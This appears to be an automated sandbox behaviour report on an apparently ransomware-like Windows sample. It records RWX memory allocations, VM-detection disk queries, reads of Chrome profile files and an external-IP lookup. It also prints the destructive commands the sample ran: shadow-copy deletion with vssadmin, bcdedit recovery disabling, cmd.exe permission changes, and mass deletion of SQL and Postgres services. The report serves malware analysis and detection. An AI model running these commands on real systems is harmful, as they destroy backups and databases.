NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73db4000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cdf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x068b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 61440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x068b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05661000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 1440 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0566a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (5 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW July 27, 2023, 11:43 a.m.	total_number_of_free_bytes: 9934868480 free_bytes_available: 9934868480 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW July 27, 2023, 11:43 a.m.	total_number_of_free_bytes: 75309056 free_bytes_available: 75309056 root_path: E: total_number_of_bytes: 104853504	1	1
GetDiskFreeSpaceExW July 27, 2023, 11:43 a.m.	total_number_of_free_bytes: 9932664832 free_bytes_available: 0 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW July 27, 2023, 11:43 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 0 root_path: D:\ total_number_of_bytes: 0		0
GetDiskFreeSpaceExW July 27, 2023, 11:43 a.m.	total_number_of_free_bytes: 75304960 free_bytes_available: 0 root_path: E:\ total_number_of_bytes: 104853504	1	1

Steals private information from local Internet browsers (50 out of 129 events)

file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\Kill-Delete.bat

Creates a shortcut to an executable file (15 events)

file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk
file	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk

Creates a suspicious process (26 events)

cmdline	cacls C:\Windows\system32\cmd.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline	takeown /f C:\Windows\system32\cmd.exe /a
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
cmdline	cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline	cmd.exe /c bcdedit /set {current} recoveryenabled no
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
cmdline	cacls C:\Windows\system32\cmd.exe /e /g system:r
cmdline	cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\cmd.exe /e /d SERVICE
cmdline	takeown /f C:\Windows\SysWOW64\cmd.exe /a
cmdline	cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
cmdline	cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\cmd.exe /e /d "network service"
cmdline	"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo y"

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 27, 2023, 11:43 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\vssadmin.exe parameters: delete shadows /all /quiet filepath: C:\Windows\sysnative\vssadmin.exe	1	1
ShellExecuteExW July 27, 2023, 11:43 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe filepath: cmd.exe	1	1
ShellExecuteExW July 27, 2023, 11:43 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} bootstatuspolicy ignoreallfailures filepath: cmd.exe	1	1
ShellExecuteExW July 27, 2023, 11:43 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c bcdedit /set {current} recoveryenabled no filepath: cmd.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (45 events)

Time & API	Arguments	Status	Return
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: smss.exe process_identifier: 232	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: csrss.exe process_identifier: 308	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: wininit.exe process_identifier: 344	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: csrss.exe process_identifier: 356	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: services.exe process_identifier: 436	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: lsass.exe process_identifier: 452	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 560	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 636	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 716	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 780	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 824	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 984	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 340	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: pw.exe process_identifier: 1888	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: pw.exe process_identifier: 288	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: taskhost.exe process_identifier: 2040	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: SearchProtocolHost.exe process_identifier: 300	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: SearchFilterHost.exe process_identifier: 1516	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: svchost.exe process_identifier: 2360	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: mscorsvw.exe process_identifier: 2388	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: mscorsvw.exe process_identifier: 2432	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: sppsvc.exe process_identifier: 2480	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 2556	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: conhost.exe process_identifier: 2564	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: pw.exe process_identifier: 2588	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: cmd.exe process_identifier: 2620	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: conhost.exe process_identifier: 2656	1	1
Process32NextW July 27, 2023, 11:43 a.m.	snapshot_handle: 0x0000034c process_name: MSBuild.exe process_identifier: 2680	1	1
